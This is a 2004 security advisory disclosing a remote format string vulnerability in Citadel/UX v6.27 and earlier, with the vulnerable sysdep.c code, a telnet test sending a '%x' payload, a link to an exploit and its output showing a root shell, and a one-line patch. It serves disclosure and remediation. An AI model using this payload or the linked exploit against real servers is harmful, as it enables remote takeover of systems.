09 - Citadel/UX <= v6.27 and prior Format String Vulnerability
No System Group - Advisory #09 - 12/12/04
- Program: Citadel/UX
- Homepage: http://www.citadel.org
- Operating System: Linux and Unix-Compatible
- Vulnerable Versions: Citadel/UX v6.27 and prior
- Risk: High
- Impact: Remote Format String Vulnerability
DESCRIPTION
Citadel/UX is an advanced client/server messaging and collaboration system for BBS and groupware applications. Users can connect to Citadel/UX using any telnet, WWW, or client software. Among the features supported are public and private message bases (rooms), electronic mail, real-time chat, paging, etc. The server is multithreaded and can easily support a large number of concurrent users. In addition, SMTP, IMAP, and POP3 servers are built-in for easy connection to Internet mail. Citadel/UX is both robust and mature, having been developed over the course of the past thirteen years.
More informations at: http://www.citadel.org
DETAILS
Exist a format string bug in the lprintf() function of sysdep.c when parses erroneous arguments to the syslog() function. This may to cause a denial of service or give remote shell with privileges of Citadel/UX.
---------- sysdep.c ----------
108: void lprintf(enum LogLevel loglevel, const char *format, ...) {
109: va_list arg_ptr;
110: char buf[SIZ];
111:
112: va_start(arg_ptr, format);
113: vsnprintf(buf, sizeof(buf), format, arg_ptr);
114: va_end(arg_ptr);
115:
116: if (syslog_facility >= 0) {
117: if (loglevel <= verbosity) {
118: /* Hackery -IO */
119: if (CC && CC->cs_pid) {
120: memmove(buf + 6, buf, sizeof(buf) - 6);
121: snprintf(buf, 6, "[%3d]", CC->cs_pid);
122: buf[5] = ' ';
123: }
124: syslog(loglevel, buf); // <-- the format bug
125: }
126: }
---------- sysdep.c ----------
Now we proceed to see what happens.
coki@nosystem:~/audit$ telnet localhost 504
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
200 nosystem Citadel server ready.
AAAA%x
530 Unrecognized or unsupported command.
quit
200 Goodbye.
Connection closed by foreign host.
coki@nosystem:~/audit$
We connect us to Citadel/UX server to 504 port and send a test string.
coki@nosystem:~/audit$ tail -n 5 /var/log/messages
Dec 12 11:08:18 nosystem citadel[1305]: Database log file cull ended.
Dec 12 11:08:19 nosystem citadel[1303]: [ 1] Session started.
Dec 12 11:08:33 nosystem citadel[1303]: [ 1] Citadel: AAAA8090fe0
Dec 12 11:08:35 nosystem citadel[1303]: [ 1] Citadel: quit
Dec 12 11:08:35 nosystem citadel[1303]: [ 1] Session ended.
coki@nosystem:~/audit$
We can to see part of the stack sending a malicious format string.
EXPLOIT
I have written a code exploit that use this format bug for to obtain a remote shell in a target.
http://www.nosystem.com.ar/exploits/citadel_fsexp.c
coki@servidor:~$ make citadel_fsexp
coki@nosystem:~/audit$ ./citadel_fsexp -h localhost -t0
Citadel/UX v6.27 remote format string exploit
by CoKi <coki@nosystem.com.ar>
[*] host : localhost
[*] system : Slackware Linux 10.0
[*] syslog GOT address : 0x0809e9e8
[*] RET address : 0xbfffd5fa
[+] verifying host... OK
[+] conecting... OK
[+] building evil buffer... OK
[+] sending evil buffer... OK
[+] waiting for shell...
[+] connecting to shell... OK
[!] you have a shell :)
Linux nosystem 2.4.26 #29 Mon Jun 14 19:22:30 PDT 2004 i686 unknown unknown GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
SOLUTIONS
The patch is included here:
--- sysdep.c 2004-11-03 17:19:00.000000000 -0300
+++ sysdep.c 2004-12-12 13:14:12.000000000 -0300
@@ -121,7 +121,7 @@
snprintf(buf, 6, "[%3d]", CC->cs_pid);
buf[5] = ' ';
}
- syslog(loglevel, buf);
+ syslog(loglevel, "%s", buf);
}
}
else if (loglevel <= verbosity) {
REFERENCES
http://www.nosystem.com.ar/advisories/advisory-09.txt
CREDITS
Discovered by CoKi <coki@nosystem.com.ar>
No System Group - http://www.nosystem.com.ar